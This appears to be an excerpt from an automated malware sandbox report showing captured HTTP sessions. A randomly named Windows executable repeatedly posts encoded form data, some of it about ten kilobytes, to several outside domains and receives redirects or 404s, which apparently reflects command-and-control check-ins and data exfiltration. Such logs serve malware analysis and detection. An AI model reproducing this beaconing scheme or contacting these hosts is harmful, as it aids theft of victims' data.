                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 79 55 33 76 34 35 32 35 6e 38 66 7a 36 67 61 77 52 77 47 51 49 4a 49 32 63 6c 32 43 51 62 6d 7a 67 3d 3d
                                                                          Data Ascii: L2m0Zn=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYyU3v4525n8fz6gawRwGQIJI2cl2CQbmzg==


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.4500333.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:04.500427961 CET645OUTPOST /0m8a/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.fiqsth.vip
                                                                          Origin: http://www.fiqsth.vip
                                                                          Referer: http://www.fiqsth.vip/0m8a/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 74 37 72 62 73 43 50 54 6d 76 6f 68 39 6b 46 46 7a 4a 49 34 7a 6e 6e 4f 7a 58 51 66 79 46 4c 6d 63 3d
                                                                          Data Ascii: L2m0Zn=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIt7rbsCPTmvoh9kFFzJI4znnOzXQfyFLmc=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.4500343.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:07.046180010 CET10727OUTPOST /0m8a/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.fiqsth.vip
                                                                          Origin: http://www.fiqsth.vip
                                                                          Referer: http://www.fiqsth.vip/0m8a/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 67 63 2b 56 6e 34 54 6f 46 7a 4e 76 71 6e 67 35 5a 4a 51 50 35 51 61 6e 64 42 61 70 31 35 4b 34 38 42 34 56 34 67 35 38 4e 71 6b 6f 7a 61 67 2f 42 54 62 35 39 75 79 78 64 4c 79 37 55 69 66 78 42 76 4e 36 58 54 4a 4c 53 2b 61 6e 7a 51 47 49 54 51 33 4d 79 79 50 36 78 33 52 30 36 72 62 38 59 62 2b 30 2f 48 79 71 78 2b 6a 74 61 4d 37 34 4d 39 45 4a 75 2b 5a 53 42 6a 6b 62 31 77 2b 46 77 69 2b 4a 38 48 38 67 55 48 62 5a 4e 6e 38 61 34 59 49 52 43 64 6d 78 6b 66 47 45 79 63 66 71 61 50 6e 66 58 48 43 2f 75 48 52 52 56 76 56 31 70 59 55 47 5a 58 61 31 4e 69 37 35 47 55 6e 4c 45 50 67 49 41 4f 46 68 30 47 61 55 61 67 69 35 51 73 38 48 4c 44 6b 6f 36 6d 41 44 52 48 41 64 77 64 6d 66 2b 46 6b 69 79 59 41 4e 37 48 55 32 6a 41 75 2f 6c 70 67 33 6c 42 50 4e 42 44 51 4e 42 6d 49 45 52 44 72 48 42 54 35 76 79 43 42 4b 7a 46 68 6a 67 47 79 46 34 35 48 79 6a 47 53 37 58 [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+Fwi+J8H8gUHbZNn8a4YIRCdmxkfGEycfqaPnfXHC/uHRRVvV1pYUGZXa1Ni75GUnLEPgIAOFh0GaUagi5Qs8HLDko6mADRHAdwdmf+FkiyYAN7HU2jAu/lpg3lBPNBDQNBmIERDrHBT5vyCBKzFhjgGyF45HyjGS7XCp/qAoHiRDZU7VpPQ8YSZ5DY69kdZ3k1tA4ix20eT20jEGJLLBC4jtmETDctmVaEYK8f6W06VY938DA0Re+TIP4vuJBIswVMmi4uTABI2AZi/SVOPmExmiP4G98B0tI0FJu87FINZylezx9gGXv/BoMNa5CMk2n4u/kPZ7Y+saoXyN7kqe8nldcGqtDDuVcG8rFc0iv9xUdM8MeICBfWP/YH43fvU6wULCYwWrSd8xogmNznGndCfPSYUe0gUuq2wwlljpa9zGy7scLTSlCjRkCHGy2aGD5dYLFKi27p6BgE3/lqZyEFERrP8LdRy4TEE+1lc7OxXsWo6SboNniybOA8Wa4Lk3+uAdR6xgzX8dnOT5anN9OrzYbavkj4UT0QEZcIW1HRcxvM6iEjvZCA8TFTzC/V6dMH+TGEZu5uMNMgGkXAnNSXeX2G+zXnEVYcRb5W46B6+EwuIuVu92XO3S7gFWP1dsdvQkBM+orrQPgzmXqyyLZ7noCR3jq6580AzDrKt0d+6xbaz7/9cCn9sLqFE5lYeuKQNcRwlNXqQw4SqSnGMlgF5iLe/Kj23QGFUHRjIPe5rEr6iMtDW6IUislsPORoisrZbRziCqJ3PDe8NFV+45iEeqEKh9li76LnMoz8lg8PPym5FOAyknLwa7wpi8Ve7r+ene [TRUNCATED]


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.4500353.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:09.665139914 CET370OUTGET /0m8a/?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM= HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.fiqsth.vip
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:54:10.314495087 CET400INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 12 Nov 2024 07:54:10 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 260
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 50 63 3d 4e 42 51 64 42 42 6b 50 57 54 53 74 58 26 4c 32 6d 30 5a 6e 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 73 72 49 66 72 44 4a 65 4d 48 45 61 50 45 54 33 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 70 34 61 61 73 66 39 66 55 71 5a 79 73 31 52 77 30 35 73 41 62 6a 31 46 4e 37 6a 36 50 62 57 61 50 52 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM="}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.4500363.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:15.359469891 CET637OUTPOST /ezyn/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.bio-thymus.com
                                                                          Origin: http://www.bio-thymus.com
                                                                          Referer: http://www.bio-thymus.com/ezyn/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 73 57 73 36 59 66 6f 4f 50 33 6d 33 35 59 6e 71 48 4b 71 6a 70 44 54 47 51 61 58 6b 30 67 53 53 41 3d 3d
                                                                          Data Ascii: L2m0Zn=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99sWs6YfoOP3m35YnqHKqjpDTGQaXk0gSSA==


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.4500373.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:17.900393963 CET657OUTPOST /ezyn/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.bio-thymus.com
                                                                          Origin: http://www.bio-thymus.com
                                                                          Referer: http://www.bio-thymus.com/ezyn/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 6e 67 62 58 54 6a 70 33 64 62 4a 4d 4b 69 77 79 41 56 39 62 65 48 33 48 75 76 42 71 41 63 72 2f 73 3d
                                                                          Data Ascii: L2m0Zn=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpngbXTjp3dbJMKiwyAV9beH3HuvBqAcr/s=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.4500383.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:20.458427906 CET10739OUTPOST /ezyn/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.bio-thymus.com
                                                                          Origin: http://www.bio-thymus.com
                                                                          Referer: http://www.bio-thymus.com/ezyn/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 7a 34 33 37 6b 44 2b 45 43 6a 6b 2b 66 49 59 45 75 46 75 55 4e 31 48 76 65 4a 32 67 73 6e 6d 2f 75 79 30 56 2b 6c 62 2f 4a 63 35 72 59 38 30 31 6f 78 68 32 58 56 4e 2b 70 62 4a 49 52 4b 49 38 2b 45 67 33 6e 36 2b 69 44 68 33 36 6e 55 4d 2b 68 32 6c 6b 38 78 4e 69 4b 32 64 5a 77 35 52 32 63 57 46 6b 69 4d 38 6a 54 65 78 36 64 44 39 44 67 45 42 56 4b 6a 4e 42 38 34 6f 55 4b 43 58 6e 77 58 37 45 62 43 63 37 46 63 51 4b 6d 67 39 77 52 6f 52 2b 6b 38 37 32 39 77 59 74 48 36 58 41 44 [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrUbyuziY/XC0Y+0CDeME//caypE0jvp9nx3HVhTIdojG/4tF2As8JMdXdTKw8l+e19+LEPQf4NxXy4+VTYkUhuDiLYprVFZnUrA09OwQ6THmC2Lc3XS1xYa7uvE4ZHQAez437kD+ECjk+fIYEuFuUN1HveJ2gsnm/uy0V+lb/Jc5rY801oxh2XVN+pbJIRKI8+Eg3n6+iDh36nUM+h2lk8xNiK2dZw5R2cWFkiM8jTex6dD9DgEBVKjNB84oUKCXnwX7EbCc7FcQKmg9wRoR+k8729wYtH6XADyiB37aqfLONKGl7jViZWc9zQpkn4S5f6ZaQgv0qjyDUbNOHU63ye09q3i63YwgPa4qHhp50Yvn5zBWHxh2jOazlu3EiFEty3/PvO6T7VljZtnA/YGLteCWFq88rdeEP/el2e/Hzddt1biNmVBQWZhrU271S564LqgOlp0//CoIFe6f96gnj69du9HfrlDpPC4JqRDBqT6U7aGjS80c+Ejqm0ar2DPI0hAKn5UNMlOBMCUzBCDKb0CtrGFJBrI8WEPLDEU6lHSriyaUKr0Vn87eZdZRXR3hPXHgWUBM0Ml71riQmLJc+FERsOFItEBTFEcMvI+TBenW/8jc+3y3oY9WzBGUZ0bQLgzMrNIHN/UAuPfZ2GqxagG8+tDHi5XcsVcoz5ZP4ShRBQ5daHUG/68vS+tbOnqBxh9QI06DCFGw1n9QhVuZwTH5g5SkIa2oIHYc7vuVMI1YSpLJ17beQAWHPh5mITNLelUtOtIiod+6MAmzF4jndnlqjV4EHwM8+EmEvapyrSGsUCgEFKV7V3rqWOWl9VJIJjM5wAzSH/TvDJlzmMZYMwUukMWHp9vUsMIaPgI05Gs4et/uhvRGNFrIwvO/IsoE2voUm9D4W5zcoOKy86rGgrDK2saT3SBv+dyt86LO60Ua+tBv0w6JobWS0MEEQ7m+NL89 [TRUNCATED]


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.4500393.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:22.992609024 CET374OUTGET /ezyn/?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.bio-thymus.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:54:24.558825970 CET400INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 12 Nov 2024 07:54:24 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 260
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 32 6d 30 5a 6e 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 51 5a 61 51 49 47 54 35 47 6a 62 74 67 2f 73 72 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4c 4e 35 2f 4f 31 63 62 34 4d 30 44 41 71 66 61 78 37 4e 36 63 58 4a 75 43 6b 62 6b 61 37 78 4f 52 79 34 3d 26 4a 50 63 3d 4e 42 51 64 42 42 6b 50 57 54 53 74 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.45004047.52.221.8802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:30.273874998 CET637OUTPOST /9ezc/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.wukong.college
                                                                          Origin: http://www.wukong.college
                                                                          Referer: http://www.wukong.college/9ezc/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 51 38 44 38 75 71 77 37 5a 4b 41 59 74 7a 39 4a 6d 6e 79 38 6a 4d 73 49 43 43 36 6c 31 4a 2b 70 41 3d 3d
                                                                          Data Ascii: L2m0Zn=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVQ8D8uqw7ZKAYtz9Jmny8jMsICC6l1J+pA==
                                                                          Nov 12, 2024 08:54:31.225981951 CET390INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:31 GMT
                                                                          Server: Apache
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Content-Length: 179
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                          Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.45004147.52.221.8802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:32.824914932 CET657OUTPOST /9ezc/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.wukong.college
                                                                          Origin: http://www.wukong.college
                                                                          Referer: http://www.wukong.college/9ezc/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 6f 66 56 46 4c 4f 6f 32 30 33 79 48 4f 75 4d 50 63 4a 6d 66 33 76 34 75 4a 46 2f 4a 2b 66 32 48 51 3d
                                                                          Data Ascii: L2m0Zn=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujofVFLOo203yHOuMPcJmf3v4uJF/J+f2HQ=
                                                                          Nov 12, 2024 08:54:33.780483007 CET390INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:33 GMT
                                                                          Server: Apache
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Content-Length: 179
